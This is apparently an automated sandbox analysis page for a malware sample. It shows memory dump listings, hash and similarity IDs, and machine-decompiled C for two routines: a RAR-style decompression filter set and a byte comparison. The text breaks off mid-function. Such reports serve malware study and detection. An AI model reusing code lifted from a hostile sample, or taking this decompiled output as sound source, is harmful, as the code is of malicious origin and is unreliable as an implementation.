          0x002068df
          0x002068e6
          0x002068f0
          0x002068f2
          0x002068fb
          0x002068fd
          0x002068fd
          0x00206900
          0x00206900
          0x00206905
          0x0020690c
          0x00206912
          0x00206918
          0x0020691f
          0x0020694c
          0x0020694d
          0x0020694e
          0x00206950
          0x0020696c
          0x0020696f
          0x00206976
          0x00206979
          0x0020697c
          0x00206987
          0x00206993
          0x00206995
          0x0020699b
          0x0020699d
          0x0020699d
          0x0020699f
          0x00000000
          0x0020699f
          0x00206958
          0x0020695b
          0x0020695b
          0x0020695d
          0x00000000
          0x00000000
          0x0020695f
          0x00206960
          0x00206963
          0x00206966
          0x00000000
          0x00000000
          0x00000000
          0x00206968
          0x0020696a
          0x00000000
          0x00206921
          0x00206923
          0x00206926
          0x00206930
          0x00206938
          0x0020693d
          0x00206940
          0x002069a7
          0x002069a7
          0x002069aa
          0x002069ad
          0x002069bd
          0x002069c0
          0x002069c0
          0x002069af
          0x002069af
          0x002069af
          0x002069c2
          0x002069c3
          0x002069c7
          0x002069c9
          0x002069cb
          0x00206ad9
          0x00206ad9
          0x00206adf
          0x00206ae5
          0x00206ae6
          0x00206aea
          0x00206af0
          0x00206af2
          0x00206af3
          0x00206af7
          0x00206afd
          0x00206aff
          0x00206aff
          0x00206b00
          0x00206b00
          0x00206afd
          0x00206af0
          0x00206b04
          0x00206b0c
          0x00206b12
          0x00206b16
          0x00000000
          0x002069d1
          0x002069d1
          0x002069d4
          0x00206ab5
          0x00206abe
          0x00206ac6
          0x00206aca
          0x00206ad1
          0x00206ad3
          0x00206ad3
          0x00206ad6
          0x00000000
          0x00206ad6
          0x002069da
          0x002069de
          0x002069e7
          0x002069f5
          0x002069f9
          0x00206a00
          0x00206a02
          0x00206a02
          0x00206a05
          0x00206a05
          0x00206a0a
          0x00206a11
          0x00206a17
          0x00206a1d
          0x00206a24
          0x00206a51
          0x00206a52
          0x00206a53
          0x00206a55
          0x00206a71
          0x00206a74
          0x00206a7b
          0x00206a7e
          0x00206a81
          0x00206a8c
          0x00206a98
          0x00206a9a
          0x00206aa0
          0x00206aa2
          0x00206aa2
          0x00206aa4
          0x00000000
          0x00206aa4
          0x00206a5d
          0x00206a60
          0x00206a60
          0x00206a62
          0x00000000
          0x00000000
          0x00206a64
          0x00206a65
          0x00206a68
          0x00206a6b
          0x00000000
          0x00000000
          0x00000000
          0x00206a6d
          0x00206a6f
          0x00000000
          0x00206a26
          0x00206a28
          0x00206a2b
          0x00206a35
          0x00206a3d
          0x00206a42
          0x00206a45
          0x00206aac
          0x00206aaf
          0x00000000
          0x00206aaf
          0x00206a24
          0x002069cb
          0x0020691f
          0x00206859
          0x00206860
          0x00206897
          0x00206897
          0x0020689c
          0x0020689f
          0x00000000
          0x0020689f
          0x00206862
          0x00206866
          0x00000000
          0x00000000
          0x00206868
          0x0020686e
          0x0020686f
          0x00206872
          0x00000000
          0x00000000
          0x00206874
          0x00206875
          0x0020687c
          0x00206880
          0x00206880
          0x00206880
          0x00000000
          0x00206880
          0x002067d0
          0x00206723
          0x002066ec
          0x00000000
          0x002066b7
          0x002066ba
          0x002066be
          0x002066c2
          0x002066c6
          0x002066c7
          0x002066ce
          0x00000000
          0x002066d0
          0x002066d0
          0x00000000
          0x002066d0
          0x002066ce

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3029b96fde79613c09e06af91da118d6a69d65c14f14bf6fbe47353bf324a34f
          • Instruction ID: bfb394a6dc040ffb406fa56cddfb4a2d964dcaa2fa09fa1dd2a8218adacee2ca
          • Opcode Fuzzy Hash: 3029b96fde79613c09e06af91da118d6a69d65c14f14bf6fbe47353bf324a34f
          • Instruction Fuzzy Hash: EE12B0B16247068BD728DF28C998779B7E0FF54308F14892EE597C7A82D374A8B4CB45
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FBAD1, Relevance: .4, Instructions: 449COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FBAD1(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				signed int _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed int _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed char _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed char _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed char _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *(_t355 + 0x60) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *(_t355 + 0x60);
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x28) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x30) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0x22d070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x28);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *((intOrPtr*)(_t355 + 0x64)) = 0;
						 *(_t355 + 0x38) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E001FC03A(_t277, _t175, 4) == 5) {
									E001FC085(_t277, E001FC03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x34);
								_t285 =  *(_t355 + 0x60);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x60) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x30);
						_t316 =  *(_t355 + 0x28);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x28) = _t316;
						 *(_t355 + 0x30) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x60) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x28) = _t289;
					 *(_t355 + 0x34) = _t278;
					 *(_t355 + 0x3c) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x24) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x14) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x1c) = 0;
						 *(_t355 + 0x10) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x60);
							_t221 =  *(_t355 + 0x34) - _t351;
							_t352 =  *(_t355 + 0x34);
							 *(_t355 + 0x20) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x3c) = E00214E62(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x24) = E00214E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t234 = E00214E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t292 =  *((intOrPtr*)(_t355 + 0x44));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x18);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
										_t279 =  *(_t355 + 0x30);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x2c);
										}
									} else {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
									}
								}
								_t223 =  *(_t355 + 0x24);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x24) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x20);
							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
							_t351 =  *(_t355 + 0x14);
							_t218 =  *(_t355 + 0x1c);
							_t319 =  *(_t355 + 0x10);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x1c) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x3c);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x2c) = _t293;
					 *(_t355 + 0x30) = _t235;
					 *(_t355 + 0x38) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x34) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
							 *(_t355 + 0x1c) = 0;
							E0020E920(_t336, _t355 + 0x40, 0, 0x1c);
							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x24) = _t336;
							if(_t336 <  *(_t355 + 0x30)) {
								_t238 =  *(_t355 + 0x60);
								do {
									_t322 =  *(_t355 + 0x1c);
									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
									_t297 =  *(_t355 + 0x2c);
									 *(_t355 + 0x18) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x2c) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
									 *(_t355 + 0x24) = _t304;
									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00214E62(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00214E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00214E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00214E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00214E62(_t323,  *(_t355 + 0x24) + _t349);
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00214E62(_t323, _t349 -  *(_t355 + 0x14));
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00214E62(_t323, _t349 +  *(_t355 + 0x14));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x10);
										_t238 =  *(_t355 + 0x60);
									} else {
										_t324 =  *(_t355 + 0x40);
										_t266 = 0;
										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x40 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x10);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x10) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x60) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x60);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x24) + _t281;
									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
									 *(_t355 + 0x24) = _t306;
								} while (_t306 <  *(_t355 + 0x30));
								_t336 =  *(_t355 + 0x34);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x34) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x28) = _t309;
				 *(_t355 + 0x60) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x24) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x60)) {
							_t310 =  *(_t355 + 0x60);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x28);
								_t274 =  *(_t355 + 0x24);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x28) = _t309;
						 *(_t355 + 0x24) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}









































































          0x001fbad1
          0x001fbadb
          0x001fbae0
          0x001fbb77
          0x00000000
          0x001fbb77
          0x001fbae9
          0x001fbfc1
          0x001fbfc4
          0x001fbfc6
          0x001fbfc9
          0x001fbfd2
          0x001fc033
          0x00000000
          0x001fc033
          0x001fbfda
          0x001fbfdc
          0x001fbfde
          0x001fbfe4
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fbfea
          0x001fbfea
          0x001fbfea
          0x001fbfec
          0x001fbfed
          0x001fbfee
          0x001fbff2
          0x001fbff8
          0x001fbffc
          0x001fc00f
          0x001fc017
          0x001fc01b
          0x001fc01b
          0x001fbffe
          0x001fc003
          0x001fc005
          0x001fc00b
          0x001fc00b
          0x001fc003
          0x001fc01d
          0x001fc021
          0x001fc024
          0x001fc027
          0x001fc027
          0x001fc02a
          0x00000000
          0x001fc02e
          0x001fbaf2
          0x001fbefb
          0x001fbefd
          0x001fbf06
          0x00000000
          0x00000000
          0x001fbf0f
          0x001fbf12
          0x001fbf18
          0x00000000
          0x00000000
          0x001fbf22
          0x001fbf23
          0x001fbf27
          0x001fbf2d
          0x001fbf30
          0x00000000
          0x00000000
          0x001fbf32
          0x001fbf3a
          0x00000000
          0x00000000
          0x001fbf3c
          0x001fbf40
          0x001fbf42
          0x001fbf47
          0x001fbf4b
          0x001fbf4f
          0x001fbf50
          0x001fbf57
          0x001fbf5b
          0x001fbf6a
          0x001fbf85
          0x001fbf85
          0x001fbf8a
          0x001fbf8e
          0x001fbf8e
          0x001fbf92
          0x001fbf93
          0x001fbf96
          0x001fbf9a
          0x001fbf9f
          0x001fbfa3
          0x001fbfa7
          0x001fbfa7
          0x001fbfaa
          0x001fbfab
          0x001fbfae
          0x001fbfb2
          0x001fbfb2
          0x00000000
          0x001fbfbc
          0x001fbafb
          0x001fbdaf
          0x001fbdb2
          0x001fbdb5
          0x001fbdb8
          0x001fbdbc
          0x001fbdbf
          0x001fbdc6
          0x001fbdca
          0x001fbdd3
          0x00000000
          0x001fbdea
          0x001fbdea
          0x001fbdec
          0x001fbdf0
          0x001fbdf3
          0x001fbdf7
          0x001fbdfb
          0x001fbdfd
          0x001fbe01
          0x001fbe05
          0x001fbe05
          0x001fbe09
          0x00000000
          0x00000000
          0x001fbe0f
          0x001fbe16
          0x001fbe1a
          0x001fbe1c
          0x001fbe20
          0x001fbe24
          0x001fbe28
          0x001fbe2a
          0x001fbe2d
          0x001fbe35
          0x001fbe3b
          0x001fbe49
          0x001fbe5e
          0x001fbe62
          0x001fbe67
          0x001fbe6b
          0x001fbe6e
          0x001fbe74
          0x001fbe84
          0x001fbe8a
          0x001fbe8e
          0x001fbe92
          0x001fbe94
          0x001fbe94
          0x001fbe7a
          0x001fbe7a
          0x001fbe7e
          0x001fbe7e
          0x001fbe74
          0x001fbe98
          0x001fbe9f
          0x001fbea2
          0x001fbeaa
          0x001fbead
          0x001fbeb4
          0x001fbeb4
          0x001fbebe
          0x001fbec2
          0x001fbec6
          0x001fbeca
          0x001fbeca
          0x001fbecb
          0x001fbecf
          0x001fbed8
          0x001fbedc
          0x001fbeef
          0x001fbee1
          0x001fbee5
          0x001fbee8
          0x001fbeec
          0x001fbeec
          0x00000000
          0x001fbef3
          0x001fbdd3
          0x001fbb04
          0x001fbb83
          0x001fbb86
          0x001fbb88
          0x001fbb8b
          0x001fbb91
          0x001fbb95
          0x001fbb9e
          0x00000000
          0x001fbbb8
          0x001fbbb8
          0x001fbbba
          0x001fbbc0
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fbbc2
          0x001fbbc2
          0x001fbbc2
          0x001fbbcb
          0x001fbbd0
          0x001fbbd2
          0x001fbbd7
          0x001fbbd9
          0x001fbbde
          0x001fbbe6
          0x001fbbea
          0x001fbbef
          0x001fbbf3
          0x001fbbf6
          0x001fbbfe
          0x001fbc04
          0x001fbc08
          0x001fbc08
          0x001fbc16
          0x001fbc1a
          0x001fbc23
          0x001fbc27
          0x001fbc2b
          0x001fbc54
          0x001fbc56
          0x001fbc65
          0x001fbc69
          0x001fbc6d
          0x001fbc76
          0x001fbc86
          0x001fbc96
          0x001fbca6
          0x001fbcb6
          0x001fbcc4
          0x001fbcd1
          0x001fbcd5
          0x001fbcdd
          0x001fbd79
          0x001fbd7d
          0x001fbce3
          0x001fbce3
          0x001fbce7
          0x001fbce9
          0x001fbcef
          0x001fbcf0
          0x001fbcf4
          0x001fbcf6
          0x001fbcfa
          0x001fbcfa
          0x001fbcfc
          0x001fbd01
          0x001fbd02
          0x001fbd07
          0x001fbd0b
          0x001fbd0e
          0x001fbd6d
          0x001fbd74
          0x001fbd76
          0x001fbd76
          0x00000000
          0x001fbd74
          0x001fbd10
          0x001fbd13
          0x001fbd61
          0x001fbd68
          0x001fbd6a
          0x001fbd6a
          0x00000000
          0x001fbd68
          0x001fbd15
          0x001fbd18
          0x001fbd51
          0x001fbd58
          0x00000000
          0x00000000
          0x001fbd5a
          0x001fbd5b
          0x001fbd5b
          0x00000000
          0x001fbd5b
          0x001fbd1a
          0x001fbd1d
          0x001fbd45
          0x001fbd4c
          0x00000000
          0x00000000
          0x001fbd4e
          0x00000000
          0x001fbd4e
          0x001fbd1f
          0x001fbd22
          0x001fbd39
          0x001fbd40
          0x00000000
          0x00000000
          0x001fbd42
          0x001fbd33
          0x001fbd33
          0x00000000
          0x001fbd33
          0x001fbd27
          0x001fbd2b
          0x00000000
          0x001fbd32
          0x001fbd32
          0x00000000
          0x001fbd32
          0x001fbd2b
          0x001fbd81
          0x001fbd85
          0x001fbd87
          0x001fbd8b
          0x001fbd8f
          0x001fbd99
          0x001fbd99
          0x001fbd9d
          0x001fbd9e
          0x001fbda2
          0x00000000
          0x001fbdaa
          0x001fbb9e
          0x001fbb09
          0x00000000
          0x00000000
          0x001fbb0b
          0x001fbb0e
          0x001fbb10
          0x001fbb13
          0x001fbb1a
          0x001fbb24
          0x00000000
          0x001fbb3e
          0x001fbb3e
          0x001fbb40
          0x001fbb44
          0x001fbb44
          0x001fbb46
          0x001fbb4c
          0x001fbb4e
          0x001fbb4e
          0x001fbb52
          0x001fbb52
          0x001fbb54
          0x001fbb57
          0x001fbb58
          0x001fbb5b
          0x001fbb5f
          0x00000000
          0x001fbb61
          0x001fbb61
          0x001fbb65
          0x00000000
          0x001fbb65
          0x001fbb5f
          0x001fbb69
          0x001fbb69
          0x001fbb6a
          0x001fbb6d
          0x001fbb71
          0x001fbb71
          0x00000000
          0x001fbb44

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5b7348fac5b5266677d56d108830bc9eb334196f60ccd0724cd05940f6a30d29
          • Instruction ID: 0580e482c8d0d4427e2948f91dc4f9b3b32e846c20b07f430d7619105a4d0cf4
          • Opcode Fuzzy Hash: 5b7348fac5b5266677d56d108830bc9eb334196f60ccd0724cd05940f6a30d29
          • Instruction Fuzzy Hash: FAF18971A083498FC718CF29C5C457ABBE6FBD9358F144A2EF68987255D730E906CB82
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00210113, Relevance: .3, Instructions: 345COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E00210113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
